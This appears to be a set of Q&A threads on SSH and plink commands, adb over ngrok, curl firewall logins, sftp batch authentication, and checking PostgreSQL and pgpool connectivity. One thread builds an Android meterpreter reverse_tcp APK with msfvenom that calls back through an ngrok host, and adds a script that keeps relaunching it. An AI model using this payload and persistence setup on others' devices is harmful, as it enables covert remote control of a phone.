Goal: connect to AntMiner via SSH, and send poweroff command.
command: plink.exe -v -t -ssh antminer -l root -pw xxx poweroff
Connecting to 10.0.1.11 port 22
We claim version: SSH-2.0-PuTTY_Release_0.70
Server version: SSH-2.0-dropbear_2012.55
Using SSH protocol version 2
Using Diffie-Hellman with standard group "group14"
Doing Diffie-Hellman key exchange with hash SHA-1
Host key fingerprint is:
ssh-rsa 1039 xxx
Initialised AES-256 SDCTR client->server encryption
Initialised HMAC-SHA1 client->server MAC algorithm
Initialised AES-256 SDCTR server->client encryption
Initialised HMAC-SHA1 server->client MAC algorithm
Using username "root".
Sent password
Access granted
Opening session as main channel
Opened main channel
Allocated pty (ospeed 38400bps, ispeed 38400bps)
Started a shell/command
sh: poweroff: not found
Server sent command exit status 127
Disconnected: All channels closed
So the connection is working fine, it's the sending of the command that goes wrong.
Here's what SHOULD happen: (sent the command manually this time)
command: plink.exe -v -t -ssh antminer -l root -pw xxx
Connecting to 10.0.1.11 port 22
We claim version: SSH-2.0-PuTTY_Release_0.70
Server version: SSH-2.0-dropbear_2012.55
Using SSH protocol version 2
Using Diffie-Hellman with standard group "group14"
Doing Diffie-Hellman key exchange with hash SHA-1
Host key fingerprint is:
ssh-rsa 1039 xxx
Initialised AES-256 SDCTR client->server encryption
Initialised HMAC-SHA1 client->server MAC algorithm
Initialised AES-256 SDCTR server->client encryption
Initialised HMAC-SHA1 server->client MAC algorithm
Using username "root".
Sent password
Access granted
Opening session as main channel
Opened main channel
Allocated pty (ospeed 38400bps, ispeed 38400bps)
Started a shell/command
root#antMiner:~# poweroff
Broadcast message from root#antMiner (pts/0) (Thu Jan 25 19:23:19 2018):
The system is going down for system halt NOW!
root#antMiner:~# Server unexpectedly closed network connection
FATAL ERROR: Server unexpectedly closed network connection
Anybody have any idea WHY the sending of the command "poweroff" over plink fails?
This is covered in these questions:
Script via Plink in .bat behaves differently
sudo: command not found while using plink
So one easy solution is that you can try which poweroff in a normal session, to see where poweroff resides (can be /sbin/poweroff). And then use a full path in your plink command-line.
Though the right solution is to fix your startup scripts. See the links above.
As your command-line does not work even with the -t switch, your SSH server must execute a command in "exec" channel (used when a command is provided on command-line or using -m switch) differently than in a "shell" channel. This is rather unusual.
You can force plink to use "shell" channel (like in an interactive session) by using an input redirection:
echo poweroff| plink ...
Related
I have an Android device at home that I use to develop on, and I'm connecting to it through my laptop with adb and scrcpy.
However, if I'm not home adb doesn't see the device. I made an apk for the device with msfvenom for reverse tcp like this:
msfvenom -p android/meterpreter/reverse_tcp LHOST=x.tcp.ngrok.io LPORT=(ngrok port) R > /home/user/reversetcp.apk
then I set up the reverse tcp handler in msfconsole:
msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
msf6 exploit(multi/handler) > exploit
After this I install and run the apk on my device, then meterpreter opens the session;
[*] Meterpreter session 1 opened (127.0.0.1:25565 -> 127.0.0.1:40146) at 2023-01-07 21:39:43 +0100
and the ngrok console shows up 1 connection (my device). But if I try to add the ngrok server to adb like this:
adb connect "ngrok address"
(there I tried the ngrok tcp link, and 127.0.0.1 with both ports, none of them works) I get the following error: failed to connect to '127.0.0.1:25565': Connection refused I could make a vpn on my local network, but the power usually goes down, so the vpn is a dead end. what am I doing wrong? or adb can't connect with ngrok?
My second issue is, that meterpreter randomly closes the session after around 8 minutes, and if the device powers off and on or if the power goes out the device switches from wifi to mobile data, and I can't reconnect. How can I make the apk run on startup and reconnect if there is a change in the internet connection?
Update: I made an shell script to reopen the reverse tcp apk after 10 mins or if there is internet connection, but it would be better if the connection wouldn't close, and the device isn't rooted, so I can't add the script to the folder to run on startup. Another way to keep the reverse tcp connection would be better, to open an reverse tcp (and keep it open), and if there is change in the internet connection then reconnect automatically.
Btw, here is the script that i wrote:
#!/bin/sh
# check for internet connection
while ! ping -c 1 google.com &> /dev/null
do
# wait 20 seconds before trying again
sleep 20
done
# run the activity
am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
# run the activity every 10 minutes
while true
do
sleep 600
am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
done
I am convinced that it is not possible to connect a device using reverse meterpreter shell because ADB requires a raw TCP connection rather than meterpreter shell.
You can use the ZeroTier application to create a private network for your devices that can be accessible via the internet. It functions similarly to VPN, but traffic is routed directly rather than through a centralized VPN server.
This post describes how to connect adb using TCPIP in detail.
I have been working on a batch script for some automation in the workplace. We have a Watchguard firewall and I need to sign in via batch. My present solution is sending a cURL POST request with the details needed. This is what I am calling:
set address="https://watchguard.<domain>:4100/wgcgi.cgi"
set data="fw_username=<username>&fw_password=<password>&fw_domain=<domain>&submit=Login&action=fw_logon&fw_logon_type=logon"
curl -k -m 10 -X POST -d %data% %address%
I have left the domain, username and password out for security reasons. This works almost all the time, however occasionally the cURL request hangs indefinitely despite the -m flag used. This has, so far, only occurred after the computer's 8 hour Watchguard session has expired though this doesn't always cause the issue. Once the issue shows up, it continues to happen until the machine is restarted.
This issue seems to be correlated with a similar issue on Internet Explorer. Internet Explorer hangs indefinitely while trying to open any webpage. Chrome, Edge and Firefox have no issues loading webpages. I was tipped off to the association between cURL and Internet Explorer because of this thread: https://curl.se/mail/lib-2012-10/0184.html
When I run curl -v -m 10 -X POST -d %data% %address% (with -v but no -k). Doing this gives me the following output:
* Trying <Firebox IP>...
* TCP_NODELAY set
* Connected to watchguard.<domain> (<Firebox IP>) port 4100 (#0)
* schannel: SSL/TLS connection with watchguard.<domain> port 4100 (step 1/3)
* schannel: checking server certificate revocation
When I run curl -v -k -m 10 -X POST -d %data% %address% (with -v). Doing this gives me the following output:
* Trying <Firebox IP>...
* TCP_NODELAY set
* Connected to watchguard.<domain> (<Firebox IP>) port 4100 (#0)
* schannel: SSL/TLS connection with watchguard.<domain> port 4100 (step 1/3)
* schannel: disabled server certificate revocation checks
* schannel: verifyhost setting prevents Schannel from comparing the supplied target name with the subject names in server certificates.
Is there something that I can do to make sure it goes through successfully?
cURL version:
curl 7.55.1 (Windows) libcurl/7.55.1 WinSSL
Release-Date: 2017-11-14, security patched: 2019-11-05
Protocols: dict file ftp ftps http https imap imaps pop3 pop3s smtp smtps telnet tftp
Features: AsynchDNS IPv6 Largefile SSPI Kerberos SPNEGO NTLM SSL
Watchguard version:
WatchguardFireBox M670 running Fireware OSv12.6.2.B631387
Given an IP Address and port number, is it possible to check if the machine with that IP address has Postgresql listening on the specified port? If so, how?
I just want to obtain a boolean value of whether Postgresql is listening on the specified port of the specified machine.
You can use, for example, nmap tool:
=$ sudo nmap -v -p 5930 127.0.0.1
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-25 19:28 CEST
Initiating SYN Stealth Scan at 19:28
Scanning localhost (127.0.0.1) [1 port]
Discovered open port 5930/tcp on 127.0.0.1
Completed SYN Stealth Scan at 19:28, 0.03s elapsed (1 total ports)
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000045s latency).
PORT STATE SERVICE
5930/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
Raw packets sent: 1 (44B) | Rcvd: 2 (88B)
Alternatively you can just "SELECT 1" with psql, and check output:
=$ psql -h 127.0.0.1 -p 5930 -c "select 1"
?column?
----------
1
(1 row)
=$ psql -h 127.0.0.1 -p 5940 -c "select 1"
psql: could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 5940?
I think you need to define what you're trying to achieve better. Do you just want to know if anything is listening on a certain point? If PostgreSQL is listening on a given port? If PostgreSQL is running and actually accepting connections? If you can connect to PostgreSQL, authenticate successfully and issue queries?
One option is to invoke psql to connect to it and check the result code. Do not attempt to parse the output text, since that's subject to translation into different languages.
Better, use the client library for the language of your choice - psycopg2 for Python, PgJDBC for Java, the Pg gem for Ruby, DBD::Pg for Perl, nPgSQL for C#, etc. This is the approach I'd recommend. The SQLSTATE or exception details from any connection error will tell you more about why the connection failed - you'll be able to tell the difference between the server not listening, authentication failure, etc this way. For example, in Python:
import psycopg2
try:
conn = psycopg2.connect("host=localhost dbname=postgres")
conn.close()
except psycopg2.OperationalError as ex:
print("Connection failed: {0}".format(ex))
There are exception details in ex.pgcode (the SQLSTATE) to tell you more about errors that're generated server-side, like authentication failures; it'll be empty for client-side errors.
If you just want to see if something is listening on a given IP and TCP port, you can use netcat (*nix only), or a simple script in the language of your choice that creates a socket and does a connect() then closes the socket if it gets a successful response. For example, the following trivial Python script:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect(('localhost',5432))
s.close()
except socket.error as ex:
print("Connection failed with errno {0}: {1}".format(ex.errno, ex.strerror))
The same approach applies in any programming language, just the details of the socket library and error handling vary.
For some purposes it can also be useful to use the netstat tool to passively list which processes are listening on which network sockets. The built-in netstat on Windows is pretty brain-dead so you have to do more parsing of the output than with netstat for other platforms, but it'll still do the job. The presence of a socket in netstat doesn't mean that connecting to it will succeed, though; if the process has failed in some way that leaves it broken but still running (stuck in an infinite loop, blocked by a debugger, SIGSTOPed, etc) then it won't respond to an actual connection attempt.
In brief
In details
Fastest way is to use netcat aka nc with timeout ability as shared here
Results as 0/1 means postgres working/not-working
echo 'QUIT' | nc -w SECONDS YOUR_HOST PORT; echo $?
# eg
echo 'QUIT' | nc -w 1 localhost 5432; echo $?
Another also-faster way that works for me is to use telnet as discussed here.
echo -e '\x1dclose\x0d' | telnet YOUR_HOST PORT
# eg
echo -e '\x1dclose\x0d' | telnet localhost 5432
I'm trying to download a file from sftp site using batch script. I'm getting the following error:
Permission denied (publickey,password,keyboard-interactive).
Couldn't read packet: Connection reset by peer
When running the command:
sftp -b /home/batchfile.sftp <user>#<server ip>:<folder>
the batchfile.sftp includes these data:
password
lcd [local folder]
cd [sftp server folder]
get *
bye
Note: It's working when running at the prompt as
sftp <user>#<server ip>:<folder>
But I need the ability to enter the password automatically.
You'll want to install the sshpass program. Then:
sshpass -p YOUR_PASSWORD sftp -oBatchMode=no -b YOUR_COMMAND_FILE_PATH USER#HOST
Obviously, it's better to setup public key authentication. Only use this if that's impossible to do, for whatever reason.
If you are generating a heap of commands to be run, then call that script from a terminal, you can try the following.
sftp login#host < /path/to/command/list
You will then be asked to enter your password (as per normal) however all the commands in the script run after that.
This is clearly not a completely automated option that can be used in a cron job, but it can be used from a terminal.
I advise you to run sftp with -v option. It becomes much easier to fathom what is happening.
The manual clearly states:
The final usage format allows for automated sessions using the -b
option.
In such cases, it is necessary to configure non-interactive authentication
to obviate the need to enter a password at connection time (see
sshd(8) and ssh-keygen(1) for details).
In other words you have to establish a publickey authentication. Then you'll be able to run a batch script.
P.S.
It is wrong to put your password in your batch file.
You mention batch files, am I correct then assuming that you're talking about a Windows system? If so you cannot use sshpass, and you will have to switch to a different option.
Two of such options, that follow diametrically opposite philosophies are:
psftp: command-line tool that you can call from within your batch scripts; psftp is part of the PuTTY package and you can find it here http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
Syncplify.me FTP Script: a scriptable FTP/S and SFTP client for Windows that allows you to store your password in encrypted "profile files"; check it out here http://www.syncplify.me/products/ftp-script/
Either way, switching from password to PKI authentication is strongly recommended.
PSFTP -b path/file_name.sftp user#IP_server -hostkey 1e:52:b1... -pw password
the file content is:
lcd "path_file for send"
cd path_destination
mput file_name_to_send
quit
to have the hostkey run:
psftp user#IP_SERVER
You need to use the command pscp and forcing it to pass through sftp protocol. pscp is automatically installed when you install PuttY, a software to connect to a linux server through ssh.
When you have your pscp command here is the command line:
pscp -sftp -pw <yourPassword> "<pathToYourFile(s)>" <username>#<serverIP>:<PathInTheServerFromTheHomeDirectory>
These parameters (-sftp and -pw) are only available with pscp and not scp. You can also add -r if you want to upload everything in a folder in a recursive way.
This command will help you
sshpass -p MYPASSWORD sftp MYUSERNAME#HOST
I have started the pgpool using the command
sudo pgpool -n &
it started giving the following message on the terminal:
2012-05-04 10:54:29 LOG: pid 4109: pgpool-II successfully started. version 2.3.2.1 (tomiteboshi)
But when I try to run the following command:
createdb -p 9999 bench_replication
I get the following error message:
createdb: could not connect to database postgres: could not connect to server: No such file or directory.
Is the server running locally and accepting connections on Unix domain socket "/var/run/postgresql/.s.PGSQL.9999"?
When I change the port from 9999 to 5432, a database bench_replication is created on the local node only, not on slave nodes. But, tutorial say to mention port 9999 in this command in order to create database bench_replication on all slave nodes through pgpool.
To confirm whether pgpool is really running or not, I stop the pgpool using command
2012-05-04 10:58:50 LOG: pid 4109: received smart shutdown request
stop request sent to pgpool. waiting for termination...done.
[1]+ Done sudo -A pgpool -n
which confirms the pgpool was actually running. What am I doing wrong? I have changed all my pgpool configuration file as mentioned in the standard tutorials on net.
Try this command :
createdb -p 9999 -h 127.0.0.1 bench_replication
By default PostgreSQL try to use the socket.
Late response but useful for future generations:
When you run
createdb -p 9999 bench_replication
under root, this generates the following error in log:
no pg_hba.conf entry for host "12.34.56.78", user "root", database
"postgres", SSL off
This means you should explicit mention username just like this:
createdb -U postgres -p 9999 bench_replication
Then you will get another error:
no pg_hba.conf entry for host "12.34.56.78", user "postgres", database
"postgres", SSL off
So you were blocked by second node on HBA level.
In this case either you should allow on second node access from first (in pg_hba.conf):
host all postgres 12.34.56.77 trust
or you should set password:
createdb -U postgres -p 9999 bench_replication -W SoMeP4Ssw0rD
If this is not clear enough - just check for your logs.